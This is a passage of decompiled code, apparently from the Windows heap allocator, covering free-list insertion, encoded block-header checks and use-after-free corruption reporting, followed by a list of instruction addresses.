																_t1143 = (_t1441 - _t1801 >> 0x10) + 1;
																_v32 = _t1143;
																_v128 = _t1143;
																__eflags = _t1143 - 0xfe;
																if(_t1143 >= 0xfe) {
																	E04D75FED(3,  *((intOrPtr*)(_t1519 + 0x18)), _t1441, _t1519, 0, 0);
																	_t1679 = _v80;
																	_t1143 = _v32;
																}
															} else {
																_t1143 = 0;
															}
															_v110 = _t1143;
															 *(_t1441 + 6) = _t1143;
															 *(_t1441 + 3) = 0;
															 *_t1441 = _t1679;
															while(1) {
																_t1802 = _t1441 + _t1679 * 8;
																_t1520 =  *(_t1771 + 0x4c);
																_t1147 = _t1520 >> 0x00000014 &  *(_t1771 + 0x52) ^ _t1802[1];
																__eflags = _t1147 & 0x00000001;
																if((_t1147 & 0x00000001) != 0) {
																	break;
																}
																__eflags = _t1520;
																if(_t1520 != 0) {
																	_t1705 =  *(_t1771 + 0x50) ^  *_t1802;
																	 *_t1802 = _t1705;
																	_t1548 = _t1705 >> 0x00000010 ^ _t1705 >> 0x00000008 ^ _t1705;
																	__eflags = _t1705 >> 0x18 - _t1548;
																	if(__eflags != 0) {
																		_push(_t1548);
																		E04D6D646(_t1441, _t1771, _t1802, _t1771, _t1802, __eflags);
																	}
																}
																_t1688 =  &(_t1802[4]);
																_t1521 =  *_t1688;
																_v32 = _t1521;
																_t1148 = _t1802[6];
																_v48 = _t1148;
																_t1149 =  *_t1148;
																_t1522 =  *((intOrPtr*)(_t1521 + 4));
																__eflags = _t1149 - _t1522;
																if(_t1149 != _t1522) {
																	L448:
																	E04D75FED(0xd, _t1771, _t1688, _t1522, _t1149, 0);
																	goto L449;
																} else {
																	__eflags = _t1149 - _t1688;
																	if(_t1149 != _t1688) {
																		goto L448;
																	} else {
																		 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1802 & 0x0000ffff);
																		_t1690 =  *(_t1771 + 0xb4);
																		__eflags = _t1690;
																		if(_t1690 != 0) {
																			while(1) {
																				_t1205 =  *_t1802 & 0x0000ffff;
																				_t1542 =  *((intOrPtr*)(_t1690 + 4));
																				__eflags = _t1205 - _t1542;
																				if(_t1205 < _t1542) {
																					break;
																				}
																				_t1208 =  *_t1690;
																				__eflags = _t1208;
																				if(_t1208 != 0) {
																					_t1690 = _t1208;
																					continue;
																				} else {
																					_t1205 = _t1542 - 1;
																				}
																				break;
																			}
																			_v240 = _t1205;
																			E04CC036A(_t1771, _t1690, 1,  &(_t1802[4]), _t1205,  *_t1802 & 0x0000ffff);
																		}
																		_t1154 = _v32;
																		_t1524 = _v48;
																		 *_t1524 = _t1154;
																		 *(_t1154 + 4) = _t1524;
																		__eflags = _t1802[1] & 0x00000008;
																		if((_t1802[1] & 0x00000008) == 0) {
																			L388:
																			_v60 = 1;
																			__eflags = _v44;
																			if(_v44 != 0) {
																				_t1536 = _t1802[1];
																				__eflags = _t1536 & 0x00000004;
																				if((_t1536 & 0x00000004) != 0) {
																					_t1189 = ( *_t1802 & 0x0000ffff) * 8 - 0x10;
																					_v168 = _t1189;
																					__eflags = _t1536 & 0x00000002;
																					if((_t1536 & 0x00000002) != 0) {
																						__eflags = _t1189 - 4;
																						if(_t1189 > 4) {
																							_t1189 = _t1189 - 4;
																							__eflags = _t1189;
																							_v168 = _t1189;
																						}
																					}
																					_t1191 = E04D080A0( &(_t1802[8]), _t1189, 0xfeeefeee);
																					_v32 = _t1191;
																					__eflags = _t1191 - _v168;
																					if(_t1191 != _v168) {
																						_t1537 =  *[fs:0x30];
																						__eflags =  *(_t1537 + 0xc);
																						if( *(_t1537 + 0xc) == 0) {
																							_push("HEAP: ");
																							E04CAB910();
																							_t1842 = _t1839 + 4;
																						} else {
																							E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																							_t1842 = _t1839 + 8;
																						}
																						_push(_v32 + 0x10 + _t1802);
																						E04CAB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1802);
																						_t1839 = _t1842 + 0xc;
																						_t1197 =  *[fs:0x30];
																						__eflags =  *((char*)(_t1197 + 2));
																						if( *((char*)(_t1197 + 2)) != 0) {
																							 *0x4da47a1 = 1;
																							 *0x4da4100 = _t1802;
																							asm("int3");
																							 *0x4da47a1 = 0;
																						}
																						_v44 = _v184;
																					}
																				}
																			}
																			 *(_t1441 + 2) = _t1802[1];
																			_t1526 = _v80 + ( *_t1802 & 0x0000ffff);
																			_v48 = _t1526;
																			_t1157 = _t1526 & 0x0000ffff;
																			_t1691 = _t1526 & 0x0000ffff;
																			__eflags = _t1526 - 0xfe00;
																			if(_t1526 > 0xfe00) {
																				E04CC0B10(_t1771, _t1441, _t1526);
																			} else {
																				 *_t1441 = _t1526;
																				_t1804 = _t1157;
																				 *(_t1441 + 4 + _t1526 * 8) =  *(_t1771 + 0x54) ^ _t1691;
																				__eflags = _v44;
																				if(_v44 != 0) {
																					 *(_t1441 + 2) =  *(_t1441 + 2) & 0x000000f0;
																					 *(_t1441 + 7) = 0;
																					__eflags =  *(_t1771 + 0x40) & 0x00000040;
																					if(( *(_t1771 + 0x40) & 0x00000040) != 0) {
																						_t793 = _t1441 + 0x10; // 0x10
																						E04D08140(_t793, _t1804 * 8 - 0x10, 0xfeeefeee);
																						_t794 = _t1441 + 2;
																						 *_t794 =  *(_t1441 + 2) | 0x00000004;
																						__eflags =  *_t794;
																					}
																					_t1163 = _t1771 + 0xc0;
																					__eflags =  *(_t1771 + 0xb4);
																					if( *(_t1771 + 0xb4) == 0) {
																						_t1528 =  *_t1163;
																					} else {
																						_t1528 = E04CB1C0E(_t1771, _t1804);
																						_t1163 = _t1771 + 0xc0;
																					}
																					while(1) {
																						__eflags = _t1163 - _t1528;
																						if(_t1163 == _t1528) {
																							break;
																						}
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) == 0) {
																							_t1696 =  *(_t1528 - 8);
																						} else {
																							_t1696 =  *(_t1528 - 8);
																							_v100 = _t1696;
																							__eflags =  *(_t1771 + 0x4c) & _t1696;
																							if(( *(_t1771 + 0x4c) & _t1696) != 0) {
																								_t1696 = _t1696 ^  *(_t1771 + 0x50);
																								_v100 = _t1696;
																							}
																						}
																						_v130 = _t1696;
																						__eflags = _t1804 - (_t1696 & 0x0000ffff);
																						if(_t1804 > (_t1696 & 0x0000ffff)) {
																							_t1528 =  *_t1528;
																							_t1163 = _t1771 + 0xc0;
																							continue;
																						}
																						break;
																					}
																					_t810 = _t1441 + 8; // 0x8
																					_t1805 = _t810;
																					_t1164 =  *((intOrPtr*)(_t1528 + 4));
																					_t1693 =  *_t1164;
																					__eflags = _t1693 - _t1528;
																					if(_t1693 != _t1528) {
																						__eflags = 0;
																						E04D75FED(0xd, 0, _t1528, 0, _t1693, 0);
																					} else {
																						 *_t1805 = _t1528;
																						 *((intOrPtr*)(_t1805 + 4)) = _t1164;
																						 *_t1164 = _t1805;
																						 *((intOrPtr*)(_t1528 + 4)) = _t1805;
																					}
																					 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																					_t1695 =  *(_t1771 + 0xb4);
																					__eflags = _t1695;
																					if(_t1695 == 0) {
																						goto L371;
																					} else {
																						_t1530 =  *_t1441 & 0x0000ffff;
																						while(1) {
																							__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																							if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																								break;
																							}
																							_t1171 =  *_t1695;
																							__eflags = _t1171;
																							if(_t1171 != 0) {
																								_t1695 = _t1171;
																								continue;
																							} else {
																								_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																								__eflags = _t1172;
																							}
																							L444:
																							_v248 = _t1172;
																							goto L370;
																						}
																						_t1172 = _t1530;
																						goto L444;
																					}
																				} else {
																					 *(_t1441 + 2) = 0;
																					 *(_t1441 + 7) = 0;
																					_t1180 = _t1771 + 0xc0;
																					__eflags =  *(_t1771 + 0xb4);
																					if( *(_t1771 + 0xb4) == 0) {
																						_t1533 =  *_t1180;
																					} else {
																						_t1533 = E04CB1C0E(_t1771, _t1804);
																						_t1180 = _t1771 + 0xc0;
																					}
																					while(1) {
																						__eflags = _t1180 - _t1533;
																						if(_t1180 == _t1533) {
																							break;
																						}
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) == 0) {
																							_t1700 =  *(_t1533 - 8);
																						} else {
																							_t1700 =  *(_t1533 - 8);
																							_v84 = _t1700;
																							__eflags =  *(_t1771 + 0x4c) & _t1700;
																							if(( *(_t1771 + 0x4c) & _t1700) != 0) {
																								_t1700 = _t1700 ^  *(_t1771 + 0x50);
																								_v84 = _t1700;
																							}
																						}
																						_v132 = _t1700;
																						__eflags = _t1804 - (_t1700 & 0x0000ffff);
																						if(_t1804 > (_t1700 & 0x0000ffff)) {
																							_t1533 =  *_t1533;
																							_t1180 = _t1771 + 0xc0;
																							continue;
																						}
																						break;
																					}
																					_t774 = _t1441 + 8; // 0x8
																					_t1805 = _t774;
																					_t1181 =  *((intOrPtr*)(_t1533 + 4));
																					_t1698 =  *_t1181;
																					__eflags = _t1698 - _t1533;
																					if(_t1698 != _t1533) {
																						__eflags = 0;
																						E04D75FED(0xd, 0, _t1533, 0, _t1698, 0);
																					} else {
																						 *_t1805 = _t1533;
																						 *((intOrPtr*)(_t1805 + 4)) = _t1181;
																						 *_t1181 = _t1805;
																						 *((intOrPtr*)(_t1533 + 4)) = _t1805;
																					}
																					 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																					_t1695 =  *(_t1771 + 0xb4);
																					__eflags = _t1695;
																					if(_t1695 == 0) {
																						L371:
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) != 0) {
																							 *(_t1441 + 3) =  *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441;
																							 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
																						}
																						goto L447;
																					} else {
																						_t1530 =  *_t1441 & 0x0000ffff;
																						while(1) {
																							__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																							if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																								break;
																							}
																							_t1184 =  *_t1695;
																							__eflags = _t1184;
																							if(_t1184 != 0) {
																								_t1695 = _t1184;
																								continue;
																							} else {
																								_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																								__eflags = _t1172;
																							}
																							L421:
																							_v244 = _t1172;
																							L370:
																							E04CB1B5D(_t1771, _t1695, 1, _t1805, _t1172, _t1530);
																							goto L371;
																						}
																						_t1172 = _t1530;
																						goto L421;
																					}
																				}
																				goto L525;
																			}
																			L447:
																			_v109 = 1;
																			_v59 = 0;
																			goto L222;
																		} else {
																			_t1202 = E04CAF5C7(_t1771, _t1802);
																			__eflags = _t1202;
																			if(_t1202 != 0) {
																				goto L388;
																			} else {
																				E04CAF113(_t1771, _t1802,  *_t1802 & 0x0000ffff, 1);
																				L449:
																				_v60 = 0;
																				__eflags = _v72;
																				if(_v72 != 0) {
																					_v109 = 0;
																					 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000003c;
																					_t1803 =  *[fs:0x18];
																					_v316 = _t1803;
																					 *((intOrPtr*)(_t1803 + 0x34)) = E04CDABA0(0xc000003c);
																				} else {
																					_v72 = 1;
																					_t1679 = _v80;
																					continue;
																				}
																			}
																		}
																	}
																}
																goto L517;
															}
															_t1708 = _t1679 & 0x0000ffff;
															_v40 = _t1708;
															_t1802[2] =  *(_t1771 + 0x54) ^ _t1708;
															__eflags = _v44;
															if(_v44 != 0) {
																 *(_t1441 + 2) =  *(_t1441 + 2) & 0x000000f0;
																 *(_t1441 + 7) = 0;
																__eflags =  *(_t1771 + 0x40) & 0x00000040;
																if(( *(_t1771 + 0x40) & 0x00000040) != 0) {
																	_t676 = _t1441 + 0x10; // 0x10
																	E04D08140(_t676, _t1708 * 8 - 0x10, 0xfeeefeee);
																	_t677 = _t1441 + 2;
																	 *_t677 =  *(_t1441 + 2) | 0x00000004;
																	__eflags =  *_t677;
																	_t1708 = _v40;
																}
																_t1806 = _t1771 + 0xc0;
																__eflags =  *(_t1771 + 0xb4);
																if( *(_t1771 + 0xb4) == 0) {
																	_t1550 =  *_t1806;
																} else {
																	_t1550 = E04CB1C0E(_t1771, _t1708);
																}
																while(1) {
																	__eflags = _t1806 - _t1550;
																	if(_t1806 == _t1550) {
																		break;
																	}
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) == 0) {
																		_t1711 =  *(_t1550 - 8);
																	} else {
																		_t1711 =  *(_t1550 - 8);
																		_v76 = _t1711;
																		__eflags =  *(_t1771 + 0x4c) & _t1711;
																		if(( *(_t1771 + 0x4c) & _t1711) != 0) {
																			_t1711 = _t1711 ^  *(_t1771 + 0x50);
																			_v76 = _t1711;
																		}
																	}
																	_v134 = _t1711;
																	__eflags = _v40 - (_t1711 & 0x0000ffff);
																	if(_v40 > (_t1711 & 0x0000ffff)) {
																		_t1550 =  *_t1550;
																		continue;
																	}
																	break;
																}
																_t693 = _t1441 + 8; // 0x8
																_t1805 = _t693;
																_t1216 =  *((intOrPtr*)(_t1550 + 4));
																_t1709 =  *_t1216;
																__eflags = _t1709 - _t1550;
																if(_t1709 != _t1550) {
																	__eflags = 0;
																	E04D75FED(0xd, 0, _t1550, 0, _t1709, 0);
																} else {
																	 *_t1805 = _t1550;
																	 *((intOrPtr*)(_t1805 + 4)) = _t1216;
																	 *_t1216 = _t1805;
																	 *((intOrPtr*)(_t1550 + 4)) = _t1805;
																}
																 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																_t1695 =  *(_t1771 + 0xb4);
																__eflags = _t1695;
																if(_t1695 != 0) {
																	_t1530 =  *_t1441 & 0x0000ffff;
																	while(1) {
																		__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																		if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																			break;
																		}
																		_t1219 =  *_t1695;
																		__eflags = _t1219;
																		if(_t1219 != 0) {
																			_t1695 = _t1219;
																			continue;
																		} else {
																			_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																			__eflags = _t1172;
																		}
																		L369:
																		_v236 = _t1172;
																		goto L370;
																	}
																	_t1172 = _t1530;
																	goto L369;
																}
															} else {
																 *(_t1441 + 2) = 0;
																 *(_t1441 + 7) = 0;
																_t1226 = _t1771 + 0xc0;
																_t1807 =  *(_t1771 + 0xb4);
																_v36 = _t1807;
																__eflags = _t1807;
																if(_t1807 == 0) {
																	_t1553 =  *_t1226;
																} else {
																	while(1) {
																		_t1564 =  *((intOrPtr*)(_t1807 + 4));
																		__eflags = _t1708 - _t1564;
																		if(_t1708 < _t1564) {
																			break;
																		}
																		_t1249 =  *_t1807;
																		__eflags = _t1249;
																		if(_t1249 != 0) {
																			_t1807 = _t1249;
																			_v36 = _t1807;
																			continue;
																		} else {
																			_t1250 = _t1564 - 1;
																			L270:
																			_v164 = _t1250;
																		}
																		L271:
																		_v96 = _t1250;
																		_v80 = _t1250 -  *(_t1807 + 0x14);
																		_v108 = 0;
																		_t1252 =  *(_t1807 + 0x18);
																		_v56 = _t1252;
																		_t1565 =  *((intOrPtr*)(_t1252 + 4));
																		__eflags = _t1252 - _t1565;
																		if(_t1252 != _t1565) {
																			_t1253 = _t1565 - 8;
																			_v32 = _t1253;
																			_t1724 =  *_t1253;
																			_v380 = _t1724;
																			__eflags =  *(_t1771 + 0x4c);
																			if( *(_t1771 + 0x4c) != 0) {
																				_t1724 = _t1724 ^  *(_t1771 + 0x50);
																				_v48 = _t1724;
																				_v380 = _t1724;
																				__eflags = _t1724 >> 0x18 - (_t1724 >> 0x00000010 ^ _t1724 >> 0x00000008 ^ _t1724);
																				if(_t1724 >> 0x18 != (_t1724 >> 0x00000010 ^ _t1724 >> 0x00000008 ^ _t1724)) {
																					E04D75FED(3, _t1771, _v32, 0, 0, 0);
																					_t1724 = _v48;
																				}
																			}
																			_t1567 = _v40 - (_t1724 & 0x0000ffff);
																			_v300 = _t1567;
																			__eflags = _t1567;
																			if(_t1567 <= 0) {
																				_t1257 =  *_v56 + 0xfffffff8;
																				_v32 = _t1257;
																				_t1725 =  *_t1257;
																				_v388 = _t1725;
																				__eflags =  *(_t1771 + 0x4c);
																				if( *(_t1771 + 0x4c) != 0) {
																					_t1725 = _t1725 ^  *(_t1771 + 0x50);
																					_v48 = _t1725;
																					_v388 = _t1725;
																					__eflags = _t1725 >> 0x18 - (_t1725 >> 0x00000010 ^ _t1725 >> 0x00000008 ^ _t1725);
																					if(_t1725 >> 0x18 != (_t1725 >> 0x00000010 ^ _t1725 >> 0x00000008 ^ _t1725)) {
																						E04D75FED(3, _t1771, _v32, 0, 0, 0);
																						_t1725 = _v48;
																					}
																				}
																				_t1569 = _v40 - (_t1725 & 0x0000ffff);
																				_v304 = _t1569;
																				__eflags = _t1569;
																				if(_t1569 > 0) {
																					__eflags =  *_t1807;
																					if( *_t1807 != 0) {
																						L296:
																						_t1570 = _v80;
																						_t1727 = _t1570 >> 5;
																						_v48 = ( *((intOrPtr*)(_t1807 + 4)) -  *(_t1807 + 0x14) >> 5) - 1;
																						_t1263 =  *(_t1807 + 0x1c);
																						_t1816 = _t1263 + _t1727 * 4;
																						_t1265 = (_t1263 | 0xffffffff) << (_t1570 & 0x0000001f);
																						_v32 = _t1265;
																						_t1573 = _t1265 &  *_t1816;
																						__eflags = _t1573;
																						_t1266 = _v48;
																						while(1) {
																							_v228 = _t1816;
																							_v160 = _t1727;
																							__eflags = _t1573;
																							if(_t1573 != 0) {
																								break;
																							}
																							__eflags = _t1727 - _t1266;
																							if(_t1727 > _t1266) {
																								__eflags = _t1573;
																								if(_t1573 == 0) {
																									_t1807 = _v36;
																									L314:
																									_t1807 =  *_t1807;
																									_v36 = _t1807;
																									_t1250 =  *(_t1807 + 0x14);
																									goto L270;
																								} else {
																									break;
																								}
																							} else {
																								_t1816 =  &(_t1816[1]);
																								_t1573 =  *_t1816;
																								_t1727 = _t1727 + 1;
																								continue;
																							}
																							goto L311;
																						}
																						__eflags = _t1573;
																						if(_t1573 == 0) {
																							_t1269 = _t1573 >> 0x00000010 & 0x000000ff;
																							__eflags = _t1269;
																							if(_t1269 == 0) {
																								_t1271 = ( *((_t1573 >> 0x18) + 0x4c889b0) & 0x000000ff) + 0x18;
																								__eflags = _t1271;
																							} else {
																								_t1271 = ( *(_t1269 + 0x4c889b0) & 0x000000ff) + 0x10;
																							}
																						} else {
																							_t1274 = _t1573 & 0x000000ff;
																							__eflags = _t1573;
																							if(_t1573 == 0) {
																								_t1271 = ( *((_t1573 >> 0x00000008 & 0x000000ff) + 0x4c889b0) & 0x000000ff) + 8;
																							} else {
																								_t1271 =  *(_t1274 + 0x4c889b0) & 0x000000ff;
																							}
																						}
																						_t1729 = (_t1727 << 5) + _t1271;
																						_v160 = _t1729;
																						_t1807 = _v36;
																						__eflags =  *(_t1807 + 8);
																						if( *(_t1807 + 8) != 0) {
																							_t1729 = _t1729 + _t1729;
																							__eflags = _t1729;
																						}
																						_t1553 =  *( *((intOrPtr*)(_t1807 + 0x20)) + _t1729 * 4);
																					} else {
																						__eflags = _v96 -  *((intOrPtr*)(_t1807 + 4)) - 1;
																						if(_v96 !=  *((intOrPtr*)(_t1807 + 4)) - 1) {
																							goto L296;
																						} else {
																							_t1576 = _v80;
																							__eflags =  *(_t1807 + 8);
																							if( *(_t1807 + 8) != 0) {
																								_t1576 = _t1576 + _t1576;
																								__eflags = _t1576;
																							}
																							_t1817 =  *( *((intOrPtr*)(_t1807 + 0x20)) + _t1576 * 4);
																							while(1) {
																								__eflags = _v56 - _t1817;
																								if(_v56 == _t1817) {
																									break;
																								}
																								_t1730 =  *(_t1817 - 8);
																								_v396 = _t1730;
																								__eflags =  *(_t1771 + 0x4c);
																								if( *(_t1771 + 0x4c) != 0) {
																									_t1730 = _t1730 ^  *(_t1771 + 0x50);
																									_v32 = _t1730;
																									_v396 = _t1730;
																									__eflags = _t1730 >> 0x18 - (_t1730 >> 0x00000010 ^ _t1730 >> 0x00000008 ^ _t1730);
																									if(_t1730 >> 0x18 != (_t1730 >> 0x00000010 ^ _t1730 >> 0x00000008 ^ _t1730)) {
																										E04D75FED(3, _t1771, _t1817 - 8, 0, 0, 0);
																										_t1730 = _v32;
																									}
																								}
																								_t1578 = _v40 - (_t1730 & 0x0000ffff);
																								_v308 = _t1578;
																								__eflags = _t1578;
																								if(_t1578 > 0) {
																									_t1817 =  *_t1817;
																									continue;
																								} else {
																									_t1553 = _t1817;
																									_t1807 = _v36;
																								}
																								goto L311;
																							}
																							_t1553 = _v108;
																							_t1807 = _v36;
																						}
																					}
																				} else {
																					_t1553 =  *_v56;
																				}
																			} else {
																				_t1553 = _v56;
																			}
																		} else {
																			_t1553 = _t1252;
																		}
																		L311:
																		__eflags = _t1553;
																		if(_t1553 == 0) {
																			goto L314;
																		}
																		_t1226 = _t1771 + 0xc0;
																		goto L317;
																	}
																	_v164 = _t1708;
																	_t1250 = _t1708;
																	goto L271;
																}
																L317:
																_t1808 = _v40;
																while(1) {
																	__eflags = _t1226 - _t1553;
																	if(_t1226 == _t1553) {
																		break;
																	}
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) == 0) {
																		_t1723 =  *(_t1553 - 8);
																	} else {
																		_t1723 =  *(_t1553 - 8);
																		_v148 = _t1723;
																		__eflags =  *(_t1771 + 0x4c) & _t1723;
																		if(( *(_t1771 + 0x4c) & _t1723) != 0) {
																			_t1723 = _t1723 ^  *(_t1771 + 0x50);
																			_v148 = _t1723;
																		}
																	}
																	_v136 = _t1723;
																	__eflags = _t1808 - (_t1723 & 0x0000ffff);
																	if(_t1808 > (_t1723 & 0x0000ffff)) {
																		_t1553 =  *_t1553;
																		_t1226 = _t1771 + 0xc0;
																		continue;
																	}
																	break;
																}
																_t614 = _t1441 + 8; // 0x8
																_t1227 = _t614;
																_t1712 =  *(_t1553 + 4);
																_t1809 =  *_t1712;
																__eflags = _t1809 - _t1553;
																if(_t1809 != _t1553) {
																	__eflags = 0;
																	E04D75FED(0xd, 0, _t1553, 0, _t1809, 0);
																} else {
																	 *_t1227 = _t1553;
																	_t1227[1] = _t1712;
																	 *_t1712 = _t1227;
																	 *(_t1553 + 4) = _t1227;
																}
																 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																_t1555 =  *(_t1771 + 0xb4);
																_v56 = _t1555;
																__eflags = _t1555;
																if(_t1555 != 0) {
																	_t1230 =  *_t1441 & 0x0000ffff;
																	_v108 = _t1230;
																	while(1) {
																		_t1810 =  *((intOrPtr*)(_t1555 + 4));
																		__eflags = _t1230 - _t1810;
																		if(_t1230 < _t1810) {
																			break;
																		}
																		_t1714 =  *_t1555;
																		__eflags = _t1714;
																		if(_t1714 != 0) {
																			_t1555 = _t1714;
																			_v56 = _t1555;
																			continue;
																		} else {
																			_t1715 = _t1810 - 1;
																			_v232 = _t1715;
																		}
																		L334:
																		_t1812 = _t1715 -  *((intOrPtr*)(_t1555 + 0x14));
																		_v96 = _t1812;
																		__eflags =  *(_t1555 + 8);
																		_t1231 = _t1812 + _t1812;
																		if( *(_t1555 + 8) == 0) {
																			_t1231 = _t1812;
																		}
																		 *((intOrPtr*)(_t1555 + 0xc)) =  *((intOrPtr*)(_t1555 + 0xc)) + 1;
																		_v72 = _t1231 << 2;
																		_v80 =  *((intOrPtr*)(_v72 +  *((intOrPtr*)(_t1555 + 0x20))));
																		__eflags = _t1715 -  *((intOrPtr*)(_t1555 + 4)) - 1;
																		_t1814 = _v96;
																		if(_t1715 ==  *((intOrPtr*)(_t1555 + 4)) - 1) {
																			_t641 = _t1555 + 0x10;
																			 *_t641 =  *(_t1555 + 0x10) + 1;
																			__eflags =  *_t641;
																		}
																		_t1237 = _v80;
																		__eflags = _t1237;
																		if(_t1237 == 0) {
																			L344:
																			_t656 = _t1441 + 8; // 0x8
																			 *((intOrPtr*)(_v72 +  *((intOrPtr*)(_t1555 + 0x20)))) = _t656;
																		} else {
																			_t1241 = _t1237 + 0xfffffff8;
																			_v32 = _t1241;
																			_t1719 =  *_t1241;
																			_v404 = _t1719;
																			__eflags =  *(_t1771 + 0x4c);
																			if( *(_t1771 + 0x4c) != 0) {
																				_t1719 = _t1719 ^  *(_t1771 + 0x50);
																				_v48 = _t1719;
																				_v404 = _t1719;
																				__eflags = _t1719 >> 0x18 - (_t1719 >> 0x00000010 ^ _t1719 >> 0x00000008 ^ _t1719);
																				if(_t1719 >> 0x18 != (_t1719 >> 0x00000010 ^ _t1719 >> 0x00000008 ^ _t1719)) {
																					E04D75FED(3, _t1771, _v32, 0, 0, 0);
																					_t1719 = _v48;
																				}
																				_t1555 = _v56;
																			}
																			_t1721 = _v108 - (_t1719 & 0x0000ffff);
																			_v312 = _t1721;
																			__eflags = _t1721;
																			if(_t1721 <= 0) {
																				goto L344;
																			}
																		}
																		__eflags = _v80;
																		if(_v80 == 0) {
																			 *( *((intOrPtr*)(_v56 + 0x1c)) + (_t1814 >> 5) * 4) =  *( *((intOrPtr*)(_v56 + 0x1c)) + (_t1814 >> 5) * 4) | 0x00000001 << (_v96 & 0x0000001f);
																		}
																		goto L371;
																	}
																	_v232 = _t1230;
																	_t1715 = _t1230;
																	goto L334;
																}
															}
															goto L371;
														} else {
															 *_t1441 =  *_t1441 + 1;
															_t1302 = _t1083 + 8;
															_v32 = _t1302;
															__eflags = _t1302 - 0x3f;
															if(_t1302 >= 0x3f) {
																 *(_t1441 + 4 + _t1500 * 8) = _t1302;
																 *(_t1441 + 7) = 0x3f;
															} else {
																 *(_t1441 + 7) = _t1302;
															}
															goto L222;
														}
													}
												} else {
													E04D75FED(3, _t1771, _t1441, 0, 0, 0);
												}
											} else {
												_t1385 = E04CAF5C7(_t1771, _t1441);
												__eflags = _t1385;
												if(_t1385 != 0) {
													goto L92;
												} else {
													E04CAF113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
													L94:
													_v57 = 0;
													 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000017;
													_t1827 =  *[fs:0x18];
													_v272 = _t1827;
													 *((intOrPtr*)(_t1827 + 0x34)) = E04CDABA0(0xc0000017);
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t1429 = E04CE0990(_t1851,  *((intOrPtr*)(_t1771 + 0xc8)));
						if(_t1429 != 0) {
							_t56 = _t1771 + 0x214;
							 *_t56 =  *(_t1771 + 0x214) + 1;
							__eflags =  *_t56;
							L27:
							_v111 = 1;
							_v49 = 1;
							__eflags =  *(_t1771 + 0x48) & 0x30000000;
							if(( *(_t1771 + 0x48) & 0x30000000) != 0) {
								_t1464 = _t1771;
								E04CAEDC1();
							}
							_t1662 = _v40;
							goto L30;
						} else {
							_t1853 =  *0x4da5da8 - _t1429; // 0x0
							if(_t1853 == 0) {
								_v152 = 1;
								E04CBFED0( *((intOrPtr*)(_t1771 + 0xc8)));
								_t1464 = _t1771;
								E04CE9CEB(_t1464, 1);
								goto L27;
							} else {
								_v111 = _t1429;
								 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000194;
								_t1834 =  *[fs:0x18];
								_v260 = _t1834;
								 *((intOrPtr*)(_t1834 + 0x34)) = E04CDABA0(0xc0000194);
							}
						}
					}
					L517:
					_v8 = 0xfffffffe;
					E04CC8C72(_t1771);
					if(E04CC3C40() == 0) {
						_t988 = 0x7ffe0388;
					} else {
						_t988 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t988 != 0 && _v88 != 0) {
						_t1786 = _v68;
						if(_v68 != 0) {
							E04D6DAAF(_t1441, _t1771, _t1786 & 0xffff0000,  *((intOrPtr*)(_t1786 + 0x14)));
						}
					}
					 *[fs:0x0] = _v20;
					return _v88;
				}
				L525:
			}

0x04cc6fe0
0x04cc6fe0
0x04cc6fe5
0x04cc6fe7
0x04cc6fec
0x04cc6ff7
0x04cc6ff8
0x04cc7001
0x04cc7006
0x04cc700b
0x04cc700f
0x04cc7015
0x04cc7017
0x04cc701a
0x04cc701c
0x04cc701f
0x04cc7029
0x04cc7030
0x04cc7034
0x04cc703b
0x04cc7042
0x04cc704f
0x04cc7058
0x04cc708e
0x04cc7094
0x04cc709a
0x04cc709d
0x04cc70a2
0x04cc70ba
0x04cc70c0
0x04cc70e4
0x04cc70e4
0x04cc70e6
0x04cc70e8
0x04cc70e8
0x04cc70f5
0x04cc70fb
0x04cc70fe
0x04cc7100
0x04cc7100
0x04cc7105
0x04cc7110
0x04cc7113
0x04cc7116
0x04cc711c
0x04cc7127
0x04cc7127
0x04cc712a
0x04cc712d
0x04cc712d
0x04cc7130
0x04cc711e
0x04cc711e
0x04cc7125
0x00000000
0x00000000
0x04cc7125
0x04cc7133
0x04cc7133
0x04cc7136
0x00000000
0x04cc70c2
0x04cc70c2
0x04cc70c8
0x00000000
0x04cc70ca
0x04cc70cb
0x04cc70d3
0x04cc70e1
0x04cc70e1
0x04cc70c8
0x04cc70a4
0x04cc70a4
0x04cc70a9
0x04cc70b7
0x04cc70b7
0x04cc7063
0x04cc7063
0x04cc7065
0x04cc7068
0x04cc706a
0x04cc7070
0x04cc7072
0x04cc7076
0x04cc707b
0x04cc707b
0x04cc7081
0x04cc7139
0x04cc7139
0x04cc713f
0x04cc7150
0x04cc7153
0x04cc7153
0x04cc7156
0x04cc715d
0x04cc7161
0x04cc71f4
0x04cc71f4
0x04cc71f7
0x04cc89df
0x04cc89e3
